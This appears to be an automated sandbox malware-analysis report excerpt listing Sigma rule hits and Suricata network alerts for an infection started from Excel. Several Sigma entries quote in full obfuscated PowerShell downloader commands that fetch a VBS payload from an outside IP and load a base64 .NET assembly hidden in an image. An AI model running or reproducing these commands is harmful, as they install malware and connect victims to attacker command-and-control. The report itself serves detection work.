ProcessName: wscript.exe
          Sigma detected: Dynamic CSharp Compile Artefact
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3656, TargetFilename: C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline
          Sigma detected: Modification of IE Registry Settings
          Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3268, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", CommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICA
          Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowse
          Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3656, TargetFilename: C:\Users\user\AppData\Local\Temp\j5ek5idr.dhu.ps1

          Data Obfuscation

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious location
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline", ProcessId: 3856, ProcessName: csc.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-30T08:04:22.916115+010020241971A Network Trojan was detected198.46.178.15180192.168.2.2249164TCP
          2024-10-30T08:04:25.146761+010020241971A Network Trojan was detected198.46.178.15180192.168.2.2249166TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-30T08:04:22.916020+010020244491Attempted User Privilege Gain192.168.2.2249164198.46.178.15180TCP
          2024-10-30T08:04:25.146736+010020244491Attempted User Privilege Gain192.168.2.2249166198.46.178.15180TCP
          2024-10-30T08:04:44.090523+010020244491Attempted User Privilege Gain192.168.2.2249174198.46.178.15180TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-30T08:05:07.435617+010020243121A Network Trojan was detected192.168.2.224917894.156.177.22080TCP
          2024-10-30T08:05:08.595336+010020243121A Network Trojan was detected192.168.2.224917994.156.177.22080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-30T08:05:06.459100+010020253811Malware Command and Control Activity Detected192.168.2.224917894.156.177.22080TCP
          2024-10-30T08:05:07.647492+010020253811Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
          2024-10-30T08:05:08.819302+010020253811Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
          2024-10-30T08:05:10.915321+010020253811Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
          2024-10-30T08:05:12.060057+010020253811Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
          2024-10-30T08:05:13.566514+010020253811Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
          2024-10-30T08:05:14.723916+010020253811Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
          2024-10-30T08:05:15.942458+010020253811Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
          2024-10-30T08:05:17.133399+010020253811Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
          2024-10-30T08:05:19.277982+010020253811Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
          2024-10-30T08:05:20.440589+010020253811Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
          2024-10-30T08:05:21.588925+010020253811Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
          2024-10-30T08:05:22.901001+010020253811Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
          2024-10-30T08:05:24.031737+010020253811Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
          2024-10-30T08:05:25.168138+010020253811Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
          2024-10-30T08:05:26.316456+010020253811Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
          2024-10-30T08:05:27.446562+010020253811Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
          2024-10-30T08:05:28.769767+010020253811Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
          2024-10-30T08:05:30.189639+010020253811Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
          2024-10-30T08:05:31.291768+010020253811Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
          2024-10-30T08:05:33.448528+010020253811Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
          2024-10-30T08:05:34.573615+010020253811Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
          2024-10-30T08:05:36.354024+010020253811Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
          2024-10-30T08:05:37.472418+010020253811Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
          2024-10-30T08:05:38.850079+010020253811Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
          2024-10-30T08:05:39.974781+010020253811Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
          2024-10-30T08:05:41.093295+010020253811Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
          2024-10-30T08:05:42.223444+010020253811Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
          2024-10-30T08:05:43.323474+010020253811Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
          2024-10-30T08:05:44.443649+010020253811Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
          2024-10-30T08:05:45.594078+010020253811Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
          2024-10-30T08:05:46.719816+010020253811Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
          2024-10-30T08:05:47.844722+010020253811Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
          2024-10-30T08:05:48.994924+010020253811Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
          2024-10-30T08:05:50.136564+010020253811Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
          2024-10-30T08:05:51.723367+010020253811Malware Command and Control Activity Detected192.168.2.224921494.156.177.22080TCP
          2024-10-30T08:05:53.016944+010020253811Malware Command and Control Activity Detected192.168.2.224921594.156.177.22080TCP
          2024-10-30T08:05:54.388350+010020253811Malware Command and Control Activity Detected192.168.2.224921694.156.177.22080TCP
          2024-10-30T08:05:55.506350+010020253811Malware Command and Control Activity Detected192.168.2.224921794.156.177.22080TCP
          2024-10-30T08:05:56.882882+010020253811Malware Command and Control Activity Detected192.168.2.224921894.156.177.22080TCP
          2024-10-30T08:05:58.006444+010020253811Malware Command and Control Activity Detected192.168.2.224921994.156.177.22080TCP
          2024-10-30T08:05:59.129063+010020253811Malware Command and Control Activity Detected192.168.2.224922094.156.177.22080TCP
          2024-10-30T08:06:00.249790+010020253811Malware Command and Control Activity Detected192.168.2.224922194.156.177.22080TCP
          2024-10-30T08:06:01.359866+010020253811Malware Command and Control Activity Detected192.168.2.224922294.156.177.22080TCP
          2024-10-30T08:06:03.427994+010020253811Malware Command and Control Activity Detected192.168.2.224922394.156.177.22080TCP
          2024-10-30T08:06:05.794636+010020253811Malware Command and Control Activity Detected192.168.2.224922494.156.177.22080TCP
          2024-10-30T08:06:06.906331+010020253811Malware Command and Control Activity Detected192.168.2.224922594.156.177.22080TCP
          2024-10-30T08:06:08.007595+010020253811Malware Command and Control Activity Detected192.168.2.224922694.156.177.22080TCP
          2024-10-30T08:06:09.216752+010020253811Malware Command and Control Activity Detected192.168.2.224922794.156.177.22080TCP
          2024-10-30T08:06:10.329968+010020253811Malware Command and Control Activity Detected192.168.2.224922894.156.177.22080TCP
          2024-10-30T08:06:11.503152+010020253811Malware Command and Control Activity Detected192.168.2.224922994.156.177.22080TCP
          2024-10-30T08:06:12.668267+010020253811Malware Command and Control Activity Detected192.168.2.224923094.156.177.22080TCP
          2024-10-30T08:06:13.809588+010020253811Malware Command and Control Activity Detected192.168.2.224923194.156.177.22080TCP
          2024-10-30T08:06:15.137055+010020253811Malware Command and Control Activity Detected192.168.2.224923294.156.177.22080TCP
          2024-10-30T08:06:16.279985+010020253811Malware Command and Control Activity Detected192.168.2.224923394.156.177.22080TCP
          2024-10-30T08:06:17.447186+010020253811Malware Command and Control Activity Detected192.168.2.224923494.156.177.22080TCP
          2024-10-30T08:06:18.565337+010020253811Malware Command and Control Activity Detected192.168.2.224923594.156.177.22080TCP
          2024-10-30T08:06:19.664244+010020253811Malware Command and Control Activity Detected192.168.2.224923694.156.177.22080TCP
          2024-10-30T08:06:20.905171+010020253811Malware Command and Control Activity Detected192.168.2.224923794.156.177.22080TCP
          2024-10-30T08:06:22.010824+010020253811Malware Command and Control Activity Detected192.168.2.224923894.156.177.22080TCP
          2024-10-30T08:06:23.254521+010020253811Malware Command and Control Activity Detected192.168.2.224923994.156.177.22080TCP
          2024-10-30T08:06:24.383881+010020253811Malware Command and Control Activity Detected192.168.2.224924094.156.177.22080TCP
          2024-10-30T08:06:25.510440+010020253811Malware Command and Control Activity Detected192.168.2.224924194.156.177.22080TCP
          2024-10-30T08:06:26.683858+010020253811Malware Command and Control Activity Detected192.168.2.224924294.156.177.22080TCP
          2024-10-30T08:06:27.814008+010020253811Malware Command and Control Activity Detected192.168.2.224924394.156.177.22080TCP
          2024-10-30T08:06:28.949969+010020253811Malware Command and Control Activity Detected192.168.2.224924494.156.177.22080TCP
          2024-10-30T08:06:30.169831+010020253811Malware Command and Control Activity Detected192.168.2.224924594.156.177.22080TCP
          2024-10-30T08:06:31.261182+010020253811Malware Command and Control Activity Detected192.168.2.224924694.156.177.22080TCP
          2024-10-30T08:06:32.735329+010020253811Malware Command and Control Activity Detected192.168.2.224924794.156.177.22080TCP
          2024-10-30T08:06:33.866597+010020253811Malware Command and Control Activity Detected192.168.2.224924894.156.177.22080TCP
          2024-10-30T08:06:34.981551+010020253811Malware Command and Control Activity Detected192.168.2.224924994.156.177.22080TCP
          2024-10-30T08:06:36.091784+010020253811Malware Command and Control Activity Detected192.168.2.224925094.156.177.22080TCP
          2024-10-30T08:06:37.229832+010020253811Malware Command and Control Activity Detected192.168.2.224925194.156.177.22080TCP
          2024-10-30T08:06:38.518588+010020253811Malware Command and Control Activity Detected192.168.2.224925294.156.177.22080TCP
          2024-10-30T08:06:39.633526+010020253811Malware Command and Control Activity Detected192.168.2.224925394.156.177.22080TCP
          2024-10-30T08:06:40.751576+010020253811Malware Command and Control Activity Detected192.168.2.224925494.156.177.22080TCP
          2024-10-30T08:06:41.872360+010020253811Malware Command and Control Activity Detected192.168.2.224925594.156.177.22080TCP
          2024-10-30T08:06:43.230803+010020253811Malware Command and Control Activity Detected192.168.2.224925694.156.177.22080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-30T08:04:21.083990+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249256TCP
          2024-10-30T08:05:09.811066+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249180TCP
          2024-10-30T08:05:11.872003+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249181TCP
          2024-10-30T08:05:13.072197+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249182TCP
          2024-10-30T08:05:14.536591+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249183TCP
          2024-10-30T08:05:15.729935+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249184TCP
          2024-10-30T08:05:16.908883+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249185TCP
          2024-10-30T08:05:18.122389+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249186TCP
          2024-10-30T08:05:20.264025+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249187TCP
          2024-10-30T08:05:21.419954+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249189TCP
          2024-10-30T08:05:22.553795+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249190TCP
          2024-10-30T08:05:23.884597+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249191TCP
          2024-10-30T08:05:25.020459+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249192TCP
          2024-10-30T08:05:26.170894+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249193TCP
          2024-10-30T08:05:27.304776+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249194TCP
          2024-10-30T08:05:28.426228+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249195TCP
          2024-10-30T08:05:29.718208+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249196TCP
          2024-10-30T08:05:31.149647+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249197TCP
          2024-10-30T08:05:32.254663+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249198TCP
          2024-10-30T08:05:34.431279+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249199TCP
          2024-10-30T08:05:35.537144+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249200TCP
          2024-10-30T08:05:37.321040+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249201TCP
          2024-10-30T08:05:38.440923+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249202TCP
          2024-10-30T08:05:39.816185+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249203TCP
          2024-10-30T08:05:40.944240+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249204TCP
          2024-10-30T08:05:42.053727+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249205TCP
          2024-10-30T08:05:43.179636+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249206TCP
          2024-10-30T08:05:44.304160+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249207TCP
          2024-10-30T08:05:45.421713+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249208TCP
          2024-10-30T08:05:46.567960+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249209TCP
          2024-10-30T08:05:47.707250+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249210TCP
          2024-10-30T08:05:48.838521+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249211TCP
          2024-10-30T08:05:49.968928+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249212TCP
          2024-10-30T08:05:51.179086+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249213TCP
          2024-10-30T08:05:52.706532+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249214TCP
          2024-10-30T08:05:53.983620+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249215TCP
          2024-10-30T08:05:55.358620+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249216TCP
          2024-10-30T08:05:56.475469+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249217TCP
          2024-10-30T08:05:57.844064+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249218TCP
          2024-10-30T08:05:58.933742+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249219TCP
          2024-10-30T08:06:00.109941+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249220TCP
          2024-10-30T08:06:01.215387+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249221TCP
          2024-10-30T08:06:02.336909+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249222TCP
          2024-10-30T08:06:04.397606+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249223TCP
          2024-10-30T08:06:06.754473+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249224TCP
          2024-10-30T08:06:07.863013+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249225TCP
          2024-10-30T08:06:08.980015+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249226TCP
          2024-10-30T08:06:10.189040+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249227TCP
          2024-10-30T08:06:11.281688+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249228TCP
          2024-10-30T08:06:12.479530+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249229TCP
          2024-10-30T08:06:13.661910+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249230TCP
          2024-10-30T08:06:14.774015+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249231TCP
          2024-10-30T08:06:16.122151+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249232TCP
          2024-10-30T08:06:17.241715+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249233TCP
          2024-10-30T08:06:18.423880+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249234TCP
          2024-10-30T08:06:19.518419+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249235TCP
          2024-10-30T08:06:20.620747+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249236TCP
          2024-10-30T08:06:21.865252+010020254831A Network Trojan was detected94.156.177.22080192.168.2.2249237TCP
